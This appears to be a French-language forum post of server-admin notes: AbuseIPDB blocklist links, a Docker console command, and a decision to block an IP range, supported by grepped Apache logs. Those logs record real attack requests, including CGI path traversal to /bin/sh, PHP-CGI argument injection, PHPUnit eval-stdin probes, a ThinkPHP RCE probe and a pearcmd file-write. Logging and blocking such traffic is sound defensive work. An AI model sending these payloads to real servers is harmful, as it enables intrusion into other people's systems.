NodeBB

https://github.com/borestad/blocklist-abuseipdb/ ❯ abuseipdb-s100-1d (53363 ips) ❯ abuseipdb-s100-3d (58143 ips) ❯ abuseipdb-s100-7d (69300 ips) ❯ abuseipdb-s100-14d (86898 ips) ❯ abuseipdb-s100-30d (125070 ips) ❯ abuseipdb-s100-60d (183928 ips) ❯ abuseipdb-s100-90d (247119 ips) ❯ abuseipdb-s100-120d (357106 ips) ❯ abuseipdb-s100-180d (654007 ips) ❯ abuseipdb-s100-365d (1173988 ips) ❯ abuseipdb-s100-all (1830085 ips)

Pas super intuitif le mode console : docker exec -it dawarich_app /bin/sh bin/rails console

Il faut bloquer le range 62.84.181.0/24 # grep "^62.84.181.65 " /var/log/apache2/access.*.log | awk '{print $6 " " $7 " " $8}' "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" "GET /containers/json HTTP/1.1"

Blocage de 144.172.103.95 72.132.68.158 95.103.172.144

Le prix sur les architectures de CCbot est énorme : [image: 1762611836091-5652ae1b-a0b5-48a2-83d5-e4175a3796ea-image.png]